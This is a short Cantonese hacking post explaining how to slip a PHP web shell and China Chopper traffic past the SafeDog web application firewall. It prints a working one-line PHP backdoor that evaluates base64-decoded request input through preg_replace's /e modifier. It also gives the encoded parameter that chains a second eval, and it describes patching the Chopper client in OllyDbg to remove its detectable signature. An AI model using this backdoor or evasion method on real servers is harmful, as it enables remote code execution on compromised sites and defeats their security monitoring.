传左shell上去但系被狗拦左,shell过狗仲系好容易噶,但系过左狗之后狗狗仲系拦菜刀提交的数据包 

然后骚总想到了个方法,就系在一句话解密传递的数据 

菜刀连接PHP一句话时会自己重新定义一个z0变量来执行PHP代码,我们只要用OD把EVAL POST去掉就得咯,一句话马的密码随便填,不就能过狗狗了吗 

一句话: 

<?php preg_replace("/^/e",base64_decode($_REQUEST[g]),0);?>

菜刀连接,密码随便填 

?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFt6MF0pKQ==

普通刀 

菜刀过安全狗方法


 

乱刀砍狗,让小狗跪舔菜刀 - 菜刀过安全狗方法 

打狗刀 

菜刀过安全狗方法

乱刀砍狗,让小狗跪舔菜刀 - 菜刀过安全狗方法 

总结:如果在服务端解密,客户端只传加密信息过去的话,狗永远都是打不过刀